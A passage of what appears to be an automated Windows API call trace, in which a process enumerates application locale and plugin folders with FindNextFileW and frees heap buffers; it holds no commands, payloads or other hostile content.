ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0175.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.895] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0175.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.924] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1264927, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf1264927, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf1264927, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0175.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.924] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0175.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.927] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0175.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.927] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0175.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.928] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0175.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.928] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0175.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.929] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0175.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.934] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0175.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.957] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0176.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.076] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0176.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.081] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0176.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.081] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0176.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.082] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0176.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.082] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0176.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.083] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0176.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.083] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0176.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.084] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0176.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.085] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0176.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.207] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x4b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0176.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.209] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0176.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.215] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10e716b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf10e716b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf10e716b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0176.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.216] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10e716b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf10e716b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf10e716b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0176.216] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0176.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.216] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b7c046, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0xce0d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0176.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.217] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x1b7c046, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0176.217] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0176.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0176.220] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefca319f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefca319f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefca319f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop-connector-files-select", cAlternateFileName="DESKTO~1")) returned 1 [0176.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.226] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd3bb05, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefd3bb05, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefd3bb05, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0176.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.226] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd3bb05, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefd3bb05, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefd3bb05, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0176.226] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0176.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0176.226] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea9b4b7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea9b4b7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea9b4b7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="digsig", cAlternateFileName="")) returned 1 [0176.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.231] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0176.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.235] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0176.235] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0176.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.235] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0176.235] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0176.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.237] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0176.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.487] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0176.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.487] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0176.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.487] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0176.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.487] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0176.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.487] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0176.488] HeapFree 